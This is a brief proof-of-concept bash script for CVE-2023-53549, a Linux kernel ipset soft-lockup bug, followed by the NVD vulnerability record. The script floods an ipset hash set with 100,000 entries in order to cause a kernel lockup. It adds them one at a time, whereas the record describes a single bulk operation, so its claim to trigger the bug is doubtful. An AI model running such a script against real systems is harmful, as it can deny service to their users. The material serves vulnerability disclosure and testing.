CVE-2023-53549

# PoC for CVE-2023-53549 - Linux kernel netfilter ipset soft lockup # This PoC demonstrates triggering soft lockup by adding large number of elements to ipset #!/bin/bash # Check if ipset is available if ! command -v ipset &> /dev/null; then echo "ipset is not installed" exit 1 fi # Create a hash set ipset create test_set hash:ip 2>/dev/null || ipset flush test_set # Add a large number of elements to trigger soft lockup # This will cause the kernel to spend excessive time in a single task echo "Adding large number of entries to ipset..." for i in $(seq 1 100000); do ipset add test_set 10.0.$((i / 256)).$((i % 256)) 2>/dev/null done echo "Done. Check dmesg for soft lockup messages." dmesg | grep -i "soft lockup" # Cleanup ipset destroy test_set

{"cve": {"id": "CVE-2023-53549", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:50.143", "lastModified": "2026-03-23T18:42:47.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: ipset: Rework long task execution when adding/deleting entries\n\nWhen adding/deleting large number of elements in one step in ipset, it can\ntake a reasonable amount of time and can result in soft lockup errors. The\npatch 5f7b51bf09ba (\"netfilter: ipset: Limit the maximal range of\nconsecutive elements to add/delete\") tried to fix it by limiting the max\nelements to process at all. However it was not enough, it is still possible\nthat we get hung tasks. Lowering the limit is not reasonable, so the\napproach in this patch is as follows: rely on the method used at resizing\nsets and save the state when we reach a smaller internal batch limit,\nunlock/lock and proceed from the saved state. Thus we can avoid long\ncontinuous tasks and at the same time removed the limit to add/delete large\nnumber of elements in one step.\n\nThe nfnl mutex is held during the whole operation which prevents one to\nissue other ipset commands in parallel."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-667"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.157", "versionEndExcluding": "5.10.163", "matchCriteriaId": "7B9156B5-C04C-4AA9-8ADE-C815C2500FCA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.13.14", "versionEndExcluding": "5.14", "matchCriteriaId": "FF970D18-7EB4-451F-B793-07F377236AF8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.14.1", "versionEndExcluding": "5.15.87", "matchCriteriaId": "7A3CFD6F-CEFD-48C4-A088-53D359CDA7F4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.19", "matchCriteriaId": "B70FF53F-1F99-4483-9376-CBA1A4EE0351"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.5", "matchCriteriaId": "8C1E7766-4310-43F9-BAC4-3763A36C043A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.14:-:*:*:*:*:*:*", "matchCriteriaId": "6A05198E-F8FA-4517-8D0E-8C95066AED38"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.14:rc6:*:*:*:*:*:*", "matchCriteriaId": "15013998-4AF0-4CDC-AB13-829ECD8A8E66"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.14:rc7:*:*:*:*:*:*", "matchCriteriaId": "376A25CF-C05B-48F1-99B1-8FB0314A8E06"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.2:rc1:*:*:*:*:*:*", "matchCriteriaId": "FF501633-2F44-4913-A8EE-B021929F49F6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.2:rc2:*:*:*:*:*:*", "matchCriteriaId": "2BDA597B-CAC1-4DF0-86F0-42E142C654E9"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/24a828f5a54bdeca0846526860d72b3766c5fe95", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5e29dc36bd5e2166b834ceb19990d9e68a734d7d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8964cc36ba011dc0e1041131fa2e91fb4c2a811b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a1e1521b463968b4eca7163f61fb6cc54d008061", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ee756980e491c829ba0495bb420b7224a9ee26b2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}